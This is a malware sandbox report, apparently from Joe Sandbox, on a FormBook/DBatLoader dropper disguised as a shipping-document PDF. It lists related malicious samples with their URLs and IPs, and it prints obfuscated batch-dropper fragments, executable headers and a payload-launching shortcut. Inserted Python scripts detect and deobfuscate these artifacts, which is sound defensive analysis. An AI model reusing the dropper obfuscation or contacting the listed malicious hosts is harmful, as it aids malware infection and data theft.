 | A2028041200SD.exe | Get hash | malicious | FormBook | Browse |
  • www.beylikduzu616161.xyz/2nga/
 | Delivery_Notification_00000260791.doc.js | Get hash | malicious | Unknown | Browse |
  • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
 | ce.vbs | Get hash | malicious | Unknown | Browse |
  • paste.ee/d/lxvbq
 | Label_00000852555.doc.js | Get hash | malicious | Unknown | Browse |
  • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
 | PO 20495088.exe | Get hash | malicious | FormBook | Browse |
  • www.ssrnoremt-rise.sbs/3jsc/
 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger | Browse |
  • filetransfer.io/data-package/zWkbOqX7/download
 | http://kklk16.bsyo45ksda.top | Get hash | malicious | Unknown | Browse |
  • kklk16.bsyo45ksda.top/favicon.ico
 | gusetup.exe | Get hash | malicious | Unknown | Browse |
  • www.glarysoft.com/update/glary-utilities/pro/pro50/
 | Online Interview Scheduling Form.lnk | Get hash | malicious | Ducktail | Browse |
  • gmtagency.online/api/check
52.223.13.41 | rQuotation.exe | Get hash | malicious | FormBook | Browse |
  • www.seamarket.shop/zsuo/?4v7=YAgg/ldayhOHmzfsjWLXvaG7J5REZu11MAD7iHXRrkYiTwNIRlKLNa8zNDpduzX56xW5NVkmDFlOQcyvict8ZBdH6DXl406L+zQHeArrLeiD5GII5G18dkg=&pRel=chN0
 | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | Get hash | malicious | FormBook | Browse |
  • www.panavet.net/t927/
 | PO 1202495088.exe | Get hash | malicious | FormBook | Browse |
  • www.guilda.pro/1w6c/
 | http://gameshdlive.net | Get hash | malicious | Unknown | Browse |
  • gameshdlive.net/lander
 | rpedido-002297.exe | Get hash | malicious | FormBook, GuLoader | Browse |
  • www.diterra.shop/i214/
 | ORIGINAL INVOICE COAU7230734298.pdf.exe | Get hash | malicious | FormBook | Browse |
  • www.resellnexa.shop/sfpe/
 | z4Shipping_document_pdf.exe | Get hash | malicious | FormBook | Browse |
  • www.longfilsalphonse.net/iq05/
 | PO23100072.exe | Get hash | malicious | FormBook | Browse |
  • www.timetime.store/hvm1/
 | RFQ - HTS45785-24-0907I000.exe | Get hash | malicious | FormBook | Browse |
  • www.insicilia.today/2fpq/
 | PO-000001488.exe | Get hash | malicious | FormBook | Browse |
  • www.longfilsalphonse.net/8q1d/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.techforcreators.live | rQuotation.exe | Get hash | malicious | FormBook | Browse |
  • 52.223.13.41
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | 6QLvb9i.exe | Get hash | malicious | LummaC | Browse |
  • 188.114.97.3
 | http://i646972656374o6c6373o636f6dz.oszar.com/ | Get hash | malicious | Unknown | Browse |
  • 104.16.79.73
 | securedoc_20241220T111852.html | Get hash | malicious | Unknown | Browse |
  • 104.17.25.14
 | https://visa-pwr.com/ | Get hash | malicious | Unknown | Browse |
  • 104.18.28.104
 | lumma.ps1 | Get hash | malicious | LummaC | Browse |
  • 104.21.72.190
 | vlid_acid.exe | Get hash | malicious | LummaC Stealer | Browse |
  • 172.67.190.223
 | sysmonconfig.xml | Get hash | malicious | Unknown | Browse |
  • 172.64.41.3
 | https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.com | Get hash | malicious | Unknown | Browse |
  • 172.67.134.110
 | https://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fshm.to%2fpolice&umid=0d23e2e5-f76c-4734-8c53-52692e5df704&auth=771bc9afedacaf21ff6267a075d4e92f38a56cd1-76eb9d39a6a3c5ec361f1d32692c8a467e476d6a | Get hash | malicious | Unknown | Browse |
  • 104.18.1.101
AMAZONEXPANSIONGB | T1#U52a9#U624b1.0.1.exe | Get hash | malicious | Unknown | Browse |
  • 52.223.40.198
 | telnet.sh4.elf | Get hash | malicious | Unknown | Browse |
  • 52.223.138.114
 | armv7l.elf | Get hash | malicious | Unknown | Browse |
  • 96.127.3.82
 | jklspc.elf | Get hash | malicious | Unknown | Browse |
  • 3.47.75.42
 | nabarm.elf | Get hash | malicious | Unknown | Browse |
  • 3.37.62.206
 | https://qulatrics.com/ | Get hash | malicious | Unknown | Browse |
  • 3.33.148.61
 | https://qulatrics.com/ | Get hash | malicious | Unknown | Browse |
  • 3.33.148.61
 | rQuotation.exe | Get hash | malicious | FormBook | Browse |
  • 52.223.13.41
 | x86_32.nn.elf | Get hash | malicious | Mirai, Okiru | Browse |
  • 3.54.36.218
 | nshkarm7.elf | Get hash | malicious | Mirai | Browse |
  • 3.47.75.28
UNIFIEDLAYER-AS-1US | botx.sh4.elf | Get hash | malicious | Mirai | Browse |
  • 173.254.41.71
 | botx.mpsl.elf | Get hash | malicious | Mirai | Browse |
  • 50.87.246.4
 | loligang.mpsl.elf | Get hash | malicious | Mirai | Browse |
  • 162.241.240.41
 | https://its.piquedigital.com.br/maryland.gov/&adfs/ls/client-request-id=7c724&wa=wsignin10.html | Get hash | malicious | Unknown | Browse |
  • 108.179.253.82
 | http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | Get hash | malicious | HTMLPhisher | Browse |
  • 162.241.149.91
 | http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | Get hash | malicious | HTMLPhisher | Browse |
  • 162.241.149.91
 | 987656789009800.exe | Get hash | malicious | AgentTesla | Browse |
  • 162.241.62.63
 | xd.sh4.elf | Get hash | malicious | Mirai | Browse |
  • 142.5.37.64
 | armv4l.elf | Get hash | malicious | Mirai | Browse |
  • 74.91.145.200
 | https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.com | Get hash | malicious | HTMLPhisher | Browse |
  • 192.185.77.74
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | universityform.xlsm | Get hash | malicious | Unknown | Browse |
  • 142.250.186.174
  • 172.217.16.193
 | 6QLvb9i.exe | Get hash | malicious | LummaC | Browse |
  • 142.250.186.174
  • 172.217.16.193
 | lumma.ps1 | Get hash | malicious | LummaC | Browse |
  • 142.250.186.174
  • 172.217.16.193
 | vlid_acid.exe | Get hash | malicious | LummaC Stealer | Browse |
  • 142.250.186.174
  • 172.217.16.193
 | AquaPac.exe | Get hash | malicious | LummaC Stealer | Browse |
  • 142.250.186.174
  • 172.217.16.193
 | R3nz_Loader.exe | Get hash | malicious | LummaC | Browse |
  • 142.250.186.174
  • 172.217.16.193
 | Loader.exe | Get hash | malicious | LummaC | Browse |
  • 142.250.186.174
  • 172.217.16.193
 | BasesRow.exe | Get hash | malicious | LummaC | Browse |
  • 142.250.186.174
  • 172.217.16.193
 | installer_1.05_36.5.exe | Get hash | malicious | LummaC | Browse |
  • 142.250.186.174
  • 172.217.16.193
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\Public\Libraries\hdcleziT.pif | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Get hash | malicious | DBatLoader, FormBook | Browse |
 | RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Get hash | malicious | DBatLoader, FormBook | Browse |
 | Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe | Get hash | malicious | DBatLoader, FormBook | Browse |
 | F.O Pump Istek,Docx.bat | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse |
 | D.G Governor Istek,Docx.exe | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | Browse |
 | qDKTsL1y44.exe | Get hash | malicious | DBatLoader | Browse |
 | PRODUCT.bat | Get hash | malicious | AveMaria, DBatLoader, UACMe | Browse |
 | purchaseorder.bat | Get hash | malicious | AveMaria, DBatLoader, UACMe | Browse |
 | PO11550.exe | Get hash | malicious | AveMaria, DBatLoader, UACMe | Browse |
 | SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe | Get hash | malicious | AgentTesla, DBatLoader, RedLine | Browse |
Process: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
File Type: DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Category: dropped
Size (bytes): 8556
Entropy (8bit): 4.623706637784657
Encrypted: false
SSDEEP: 192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
MD5: 60CD0BE570DECD49E4798554639A05AE
SHA1: BD7BED69D9AB9A20B5263D74921C453F38477BCB
SHA-256: CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
SHA-512: AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
Malicious: true
                                                                                                  Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%
Process: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
File Type: DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
Category: dropped
Size (bytes): 46543
Entropy (8bit): 4.705001079878445
Encrypted: false
SSDEEP: 768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
MD5: 637A66953F03B084808934ED7DF7192F
SHA1: D3AE40DFF4894972A141A631900BD3BB8C441696
SHA-256: 41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
SHA-512: 2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
Malicious: false
                                                                                                  Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .
Process: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
File Type: data
Category: dropped
Size (bytes): 615416
Entropy (8bit): 7.382983576749722
Encrypted: false
SSDEEP: 12288:LBrzKRx9NcxYqoBJBP0i3IMn0h8OYRBl3VjUcSxxi1nHW8:lHKRvyxYqoBJBP/n0fYXvjUtxs1nZ
MD5: E3FB2070B13A510150E11FF1D395FD8D
SHA1: 33C44A27F36FA78F5E4BDD640B700356BEC6DE2A
SHA-256: 2FE18E6EBE016409E31A310D3F81C0BABC1D20B7ABF97B45023C684B88154707
SHA-512: CD2976E92DE2DBFD1EC9396AD8F8111D7B886A06E2C778DED437C229DAC680D91C14F90648BA23D38C712F6214F55C55B9380081B1504E4B2EFABB3CD0324E1A
Malicious: true
                                                                                                  Preview:...Y#..K..&....%&.........&......%"'&....'..."&........%..%..."...#....Y#..K..'.......&...Y#..Khbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_hfuea^__gtqvu`h^kvngmqu]efammlht`it]b]qeehrnhbul^`ctua_mjgc_h....ba\$.3Oo4..a..2..h.V5N.=.....-....)3.t7...*............L..R ..g.\...;G....o.....p...O...&.E....l...
Process: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1364480
Entropy (8bit): 7.0624436540736975
Encrypted: false
SSDEEP: 24576:9dk7eYEWx0i5VTe5QCQBSt2jKasCr4LUkq0uHyC6q7KubU+7:90eYbSGUelD0uSC6q7bbU+
MD5: 09F4F91713BD6588465534822D5AD96C
SHA1: 3B6B69C8709AEA821D60248294D52E3CFEFECB23
SHA-256: C8E0836B1E1EA4EE7486EB41994AE198CB5F60F460DC4CBEFBBABC186329855F
SHA-512: 8B6B9AD29F50A6E141C8A3033D0F668ABF63207497EC4A8BA469D5CE08A2AB9A93A06C66CC2E57E614A45D0E188EB0A6F5E94E578C3525C127A4E288A494A774
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 26%
                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................,...........H.......P....@..........................`...................@..............................V+...................................................................................................................text....!.......".................. ..`.itext.......@.......&.............. ..`.data....*...P...,...0..............@....bss.....7...........\...................idata..V+.......,...\..............@....tls....@................................rdata..............................@..@.reloc..............................@..B.rsrc................4..............@..@.............`......................@..@................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):175800
                                                                                                  Entropy (8bit):6.631791793070417
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                  MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                  SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                  SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                  SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View (similar samples seen previously):
• Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious
• Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious
• Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious
• Filename: F.O Pump Istek,Docx.bat, Detection: malicious
• Filename: D.G Governor Istek,Docx.exe, Detection: malicious
• Filename: qDKTsL1y44.exe, Detection: malicious
• Filename: PRODUCT.bat, Detection: malicious
• Filename: purchaseorder.bat, Detection: malicious
• Filename: PO11550.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious
                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@
                                                                                                  Process:C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Tizelcdh.PIF">), ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):104
                                                                                                  Entropy (8bit):5.124973646679898
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMQAIXsbxWcuANvn:HRYFVmTWDyzyIXExWcPNvn
                                                                                                  MD5:393C77C35C343511E59469F3F9A95E45
                                                                                                  SHA1:E8DFE1A90D319C075A79728E20549A523C86CC13
                                                                                                  SHA-256:28E7B705D25D2A9F2281BE39AE3D041BFA610896478871A3BE4E43EB56AE9694
                                                                                                  SHA-512:138537AA1728E9F15146AE2B53B6B9AAC834BE1610FAC46B028B02295ACBD7A5859E00FC574DFF00E29475889FF55958AA9D207FFE6D40284805F1ECBEC1B311
                                                                                                  Malicious:true
                                                                                                  Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Tizelcdh.PIF"..IconIndex=934656..HotKey=74..
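The dropped Internet shortcut above is the link between the loader and its payload: a `.url` file whose `URL=` uses the `file:` scheme and points at an executable renamed to `.PIF` under the world-writable `C:\Users\Public\Libraries` folder. The following script is an added example, not part of the Joe Sandbox report, that parses such a shortcut and flags exactly those two properties. Its input is reconstructed from the preview shown above (the preview prints line breaks as "..", which are restored as CRLF; the doubled backslashes are kept as displayed). The extension list and the set of suspicious drop directories are assumptions chosen for illustration.

```python
import configparser
import ntpath
import re

# Reconstructed from the dropped-file preview above ("..": CRLF restored).
SHORTCUT_SAMPLE = (
    '[InternetShortcut]\r\n'
    'URL=file:"C:\\\\Users\\\\Public\\\\Libraries\\\\Tizelcdh.PIF"\r\n'
    'IconIndex=934656\r\n'
    'HotKey=74\r\n'
)

# Assumption: extensions that Windows executes directly when a shortcut opens them.
EXECUTABLE_EXTS = {".pif", ".scr", ".exe", ".com", ".bat", ".cmd", ".vbs", ".js", ".hta"}
# Assumption: world-writable locations commonly abused as drop points.
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def parse_internet_shortcut(text: str) -> dict:
    """Return the [InternetShortcut] keys (lower-cased) of a .url file, or {} if absent."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp["InternetShortcut"])  # configparser lower-cases keys by default


def shortcut_target(url_value: str) -> "str | None":
    """Normalise a file: URL to a Windows path; return None for any other scheme."""
    m = re.match(r'(?i)^file:(?://)?"?(.*?)"?$', url_value.strip())
    if not m:
        return None
    path = m.group(1).replace("\\\\", "\\").replace("/", "\\")
    if re.match(r"^\\[A-Za-z]:", path):  # file:///C:/... leaves a leading separator
        path = path[1:]
    return path


def assess_shortcut(text: str) -> dict:
    """Parse one .url file and list the properties that make it a launcher for a local executable."""
    keys = parse_internet_shortcut(text)
    url = keys.get("url", "")
    target = shortcut_target(url)
    findings = []
    if target is not None:
        low = target.lower()
        ext = ntpath.splitext(low)[1]
        if ext in EXECUTABLE_EXTS:
            findings.append(f"file: shortcut opens an executable type ({ext})")
        if low.startswith(SUSPICIOUS_DIRS):
            findings.append("target lives in a world-writable drop directory")
    return {"url": url, "target": target, "keys": keys, "findings": findings}


if __name__ == "__main__":
    for line in assess_shortcut(SHORTCUT_SAMPLE)["findings"]:
        print(line)
```

A `.url` file that resolves to a web address yields no findings; both checks fire only for local executables in drop directories, which is the combination seen here.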
                                                                                                  Process:C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                                                  File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):15789
                                                                                                  Entropy (8bit):4.658965888116939
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                  MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                  SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                  SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                  SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                  Malicious:false
                                                                                                  Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.
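The batch file preview above shows the familiar cmd obfuscation of stuffing `%name%` references between the characters of real commands: in a batch script an undefined variable expands to nothing, so `e%x%c%y%ho` runs as `echo`. The preview is lossy (non-printable and non-ASCII bytes are shown as dots), so the following added example, which is not the content of the dropped file, runs on a constructed script that uses the same pattern. It applies the batch-file expansion rules (`%%` is a literal percent, a defined variable expands to its `set` value, an undefined one to the empty string, a dangling `%` is dropped) line by line, tracking `set` assignments as it goes, and then pulls file paths out of the result as indicators.

```python
import re

# Constructed sample in the style of the dropped batch file (not its real content).
OBFUSCATED_SAMPLE = (
    '@e%e%c%c%h%h%o off\r\n'
    's%Q%e%Q%t X=st%J%ar%J%t\r\n'
    '%X% "" %R%"C:\\Users\\Public\\Libraries\\Tizelcdh.PIF"%R%\r\n'
)

# %% -> literal %, %0..%9 / %* -> batch arguments, %name% -> variable, lone % -> dropped
_TOKEN = re.compile(r'%%|%[0-9*]|%([^%\r\n]*)%|%')
# Plain "set name=value" / set "name=value" (no /a, /p); enough for this pattern.
_SET_LINE = re.compile(r'^\s*set\s+"?([^=\s"]+)=([^"\r\n]*)"?\s*$', re.I)


def deobfuscate_batch(text: str, env: dict = None) -> str:
    """Expand %variables% the way cmd does for a batch *file* and return the cleaned script."""
    env = {k.lower(): v for k, v in (env or {}).items()}
    out = []
    for line in text.splitlines():
        def expand(m):
            tok = m.group(0)
            if tok == "%%":
                return "%"
            if len(tok) == 2 and tok[1] in "0123456789*":
                return tok            # script argument, keep for the analyst
            if tok == "%":
                return ""             # dangling percent is removed in batch files
            return env.get(m.group(1).lower(), "")   # undefined -> empty string
        expanded = _TOKEN.sub(expand, line)
        m = _SET_LINE.match(expanded)
        if m:                         # later lines may reference this variable
            env[m.group(1).lower()] = m.group(2)
        if expanded.strip():          # drop lines that consisted only of junk
            out.append(expanded)
    return "\n".join(out)


def extract_paths(script: str) -> list:
    """Windows file paths appearing in the cleaned script, in order of first appearance."""
    seen, paths = set(), []
    for p in re.findall(r'[A-Za-z]:\\[^\s"<>|]+', script):
        if p.lower() not in seen:
            seen.add(p.lower())
            paths.append(p)
    return paths


if __name__ == "__main__":
    cleaned = deobfuscate_batch(OBFUSCATED_SAMPLE)
    print(cleaned)
    print("paths:", extract_paths(cleaned))
```

Substring and delayed `!var!` expansion, `set /a` and `set /p` are not handled; a script using those needs the corresponding rules added before the cleaned output can be trusted.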
                                                                                                  Process:C:\Windows\SysWOW64\proquota.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                  Category:dropped
                                                                                                  Size (bytes):196608
                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.0624436540736975
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 93.60%
                                                                                                  • Win32 Executable Borland Delphi 7 (665061/41) 6.22%
                                                                                                  • Windows Screen Saver (13104/52) 0.12%
                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  File name:Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                                                  File size:1'364'480 bytes
                                                                                                  MD5:09f4f91713bd6588465534822d5ad96c
                                                                                                  SHA1:3b6b69c8709aea821d60248294d52e3cfefecb23
                                                                                                  SHA256:c8e0836b1e1ea4ee7486eb41994ae198cb5f60f460dc4cbefbbabc186329855f
                                                                                                  SHA512:8b6b9ad29f50a6e141c8a3033d0f668abf63207497ec4a8ba469d5ce08a2ab9a93a06c66cc2e57e614a45d0e188eb0a6f5e94e578c3525c127a4e288a494a774
                                                                                                  SSDEEP:24576:9dk7eYEWx0i5VTe5QCQBSt2jKasCr4LUkq0uHyC6q7KubU+7:90eYbSGUelD0uSC6q7bbU+
                                                                                                  TLSH:EB55AE2DBE518873D13E1D794FCABAD2142EBE531D29DED663B50E2C4E393603825287
                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                  Icon Hash:8b2bdbcbe377361f
                                                                                                  Entrypoint:0x4a4814
                                                                                                  Entrypoint Section:.itext
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                  DLL Characteristics:
                                                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                  TLS Callbacks:
